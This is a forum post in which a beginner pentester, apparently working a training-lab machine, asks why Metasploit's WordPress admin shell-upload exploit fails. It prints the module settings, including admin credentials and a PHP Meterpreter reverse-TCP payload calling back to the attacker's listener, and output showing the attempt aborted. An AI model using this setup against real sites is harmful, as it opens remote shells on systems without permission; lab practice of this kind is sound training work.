Hi!
Firstly, sorry for all the mistakes in english i’m going to make … (French dude & Noob Pentester)
I having issue with Metasploit, indeed when i try to use the wp_admin_shell_upload.
Show options output: (LHost IP hidden)
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD P@s5w0rd! yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.29 yes The target host(s), range CIDR identifier, or hosts file with syntax
'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME admin yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.XXX yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
run output (LHost IP hidden)
[*] Started reverse TCP handler on 10.10.14.XXX:4444
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
I saw on many thread that can be a problem from Lhost so i changed it with the OpenVPN one.
And i saw an another point about my firewall, but i work on macOs BigSur, and i don’t really know how to fix it. I try to disable it but it’s not better …
Thanks a lot
PS: I don’t want to use parrot or Kali on a Vbox, I am in network class with my mac. I’m a dumbass I know.